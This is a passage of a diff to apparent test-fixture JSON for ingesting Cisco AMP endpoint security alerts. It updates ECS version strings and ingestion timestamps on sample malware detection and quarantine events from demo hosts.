                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419247189909832000,\"timestamp\":1610639423,\"timestamp_nanoseconds\":888000000,\"date\":\"2021-01-14T15:50:23+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419247189909831755\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
                 "kind": "alert",
                 "action": "Retrospective Detection",
@@ -2981,7 +2981,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "hosts": [
@@ -3005,7 +3005,7 @@
             },
             "event": {
                 "severity": 3,
-                "ingested": "2021-09-12T17:31:54.500201691Z",
+                "ingested": "2021-09-13T18:07:28.111208689Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419247189909832000,\"timestamp\":1610639423,\"timestamp_nanoseconds\":888000000,\"date\":\"2021-01-14T15:50:23+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419247189909831754\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
                 "kind": "alert",
                 "action": "Retrospective Detection",
@@ -3060,7 +3060,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "hosts": [
@@ -3084,7 +3084,7 @@
             },
             "event": {
                 "severity": 3,
-                "ingested": "2021-09-12T17:31:54.500203753Z",
+                "ingested": "2021-09-13T18:07:28.111210770Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419247189909832000,\"timestamp\":1610639423,\"timestamp_nanoseconds\":873000000,\"date\":\"2021-01-14T15:50:23+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419247189909831753\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"qeriuwjhrf\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\qeriuwjhrf\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
                 "kind": "alert",
                 "action": "Retrospective Detection",
@@ -3139,7 +3139,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "hosts": [
@@ -3163,7 +3163,7 @@
             },
             "event": {
                 "severity": 3,
-                "ingested": "2021-09-12T17:31:54.500205814Z",
+                "ingested": "2021-09-13T18:07:28.111212848Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419247189909832000,\"timestamp\":1610639423,\"timestamp_nanoseconds\":732000000,\"date\":\"2021-01-14T15:50:23+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419229327140847658\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
                 "kind": "alert",
                 "action": "Retrospective Detection",
@@ -3218,7 +3218,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "hosts": [
@@ -3242,7 +3242,7 @@
             },
             "event": {
                 "severity": 3,
-                "ingested": "2021-09-12T17:31:54.500207872Z",
+                "ingested": "2021-09-13T18:07:28.111214921Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419247189909832000,\"timestamp\":1610639423,\"timestamp_nanoseconds\":717000000,\"date\":\"2021-01-14T15:50:23+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419204897366867969\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
                 "kind": "alert",
                 "action": "Retrospective Detection",
@@ -3297,7 +3297,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "hosts": [
@@ -3321,7 +3321,7 @@
             },
             "event": {
                 "severity": 3,
-                "ingested": "2021-09-12T17:31:54.500209928Z",
+                "ingested": "2021-09-13T18:07:28.111216991Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419247189909832000,\"timestamp\":1610639423,\"timestamp_nanoseconds\":686000000,\"date\":\"2021-01-14T15:50:23+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419179204872503298\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
                 "kind": "alert",
                 "action": "Retrospective Detection",
@@ -3376,7 +3376,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "hosts": [
@@ -3400,7 +3400,7 @@
             },
             "event": {
                 "severity": 3,
-                "ingested": "2021-09-12T17:31:54.500212001Z",
+                "ingested": "2021-09-13T18:07:28.111219057Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419247189909832000,\"timestamp\":1610639423,\"timestamp_nanoseconds\":639000000,\"date\":\"2021-01-14T15:50:23+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419204897366867977\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
                 "kind": "alert",
                 "action": "Retrospective Detection",
@@ -3453,7 +3453,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "hosts": [
@@ -3473,7 +3473,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-12T17:31:54.500214055Z",
+                "ingested": "2021-09-13T18:07:28.111221104Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412604589194871000,\"timestamp\":1610637865,\"timestamp_nanoseconds\":994000000,\"date\":\"2021-01-14T15:24:25+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6412604589194870787\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446\"}}}}",
                 "kind": "alert",
                 "action": "Quarantine Failure",
@@ -3532,7 +3532,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "user": [
@@ -3564,7 +3564,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-12T17:31:54.500216107Z",
+                "ingested": "2021-09-13T18:07:28.111223166Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412604589194871000,\"timestamp\":1610637865,\"timestamp_nanoseconds\":573000000,\"date\":\"2021-01-14T15:24:25+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6412604589194870787\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"QuotaGroup.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\QuotaGroup\\\\QuotaGroup.exe\",\"identity\":{\"sha256\":\"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446\",\"sha1\":\"f5a171c879b90e77861daf19741b373646d791ff\",\"md5\":\"32c9e6737dbdcbfb7563a3f27e2b1571\"}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -3619,7 +3619,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "user": [
@@ -3645,7 +3645,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-12T17:31:54.500218150Z",
+                "ingested": "2021-09-13T18:07:28.111225235Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412604589194871000,\"timestamp\":1610637865,\"timestamp_nanoseconds\":479000000,\"date\":\"2021-01-14T15:24:25+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6412604589194870786\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"\",\"file_path\":\"\",\"identity\":{\"sha256\":\"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446\"}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -3702,7 +3702,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "user": [
@@ -3734,7 +3734,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-12T17:31:54.500220195Z",
+                "ingested": "2021-09-13T18:07:28.111227296Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412604589194871000,\"timestamp\":1610637865,\"timestamp_nanoseconds\":479000000,\"date\":\"2021-01-14T15:24:25+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6412604589194870785\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"QuotaGroup.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\QuotaGroup\\\\QuotaGroup.exe\",\"identity\":{\"sha256\":\"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446\",\"sha1\":\"f5a171c879b90e77861daf19741b373646d791ff\",\"md5\":\"32c9e6737dbdcbfb7563a3f27e2b1571\"}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -3787,7 +3787,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "hosts": [
@@ -3807,7 +3807,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-12T17:31:54.500222246Z",
+                "ingested": "2021-09-13T18:07:28.111229346Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412604589194871000,\"timestamp\":1610637865,\"timestamp_nanoseconds\":994000000,\"date\":\"2021-01-14T15:24:25+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6412604589194870785\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446\"}}}}",
                 "kind": "alert",
                 "action": "Threat Quarantined",
@@ -3858,7 +3858,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "hosts": [
@@ -3878,7 +3878,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-12T17:31:54.500224289Z",
+                "ingested": "2021-09-13T18:07:28.111231419Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419239055241773000,\"timestamp\":1610637529,\"timestamp_nanoseconds\":242000000,\"date\":\"2021-01-14T15:18:49+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419239055241773128\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}",
                 "kind": "alert",
                 "action": "Quarantine Failure",
@@ -3944,7 +3944,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "user": [
@@ -3974,7 +3974,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-12T17:31:54.500226335Z",
+                "ingested": "2021-09-13T18:07:28.111233495Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419239055241773000,\"timestamp\":1610637529,\"timestamp_nanoseconds\":242000000,\"date\":\"2021-01-14T15:18:49+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Gen.20gl.1201\",\"detection_id\":\"6419239055241773128\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\WINDOWS\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"},\"parent\":{\"process_id\":708,\"disposition\":\"Clean\",\"file_name\":\"lsass.exe\",\"identity\":{\"sha256\":\"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71\",\"sha1\":\"7abcc82dc5a05b4f53fd0fbd386738e5555025cf\",\"md5\":\"4e568dbe3fff1a0025eb432dc929b78f\"}}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -4031,7 +4031,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "hosts": [
@@ -4051,7 +4051,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-12T17:31:54.500228382Z",
+                "ingested": "2021-09-13T18:07:28.111235554Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419239050946806000,\"timestamp\":1610637528,\"timestamp_nanoseconds\":587000000,\"date\":\"2021-01-14T15:18:48+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419239046651838535\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}",
                 "kind": "alert",
                 "action": "Threat Quarantined",
@@ -4102,7 +4102,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "hosts": [
@@ -4122,7 +4122,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-12T17:31:54.500230510Z",
+                "ingested": "2021-09-13T18:07:28.111237711Z",
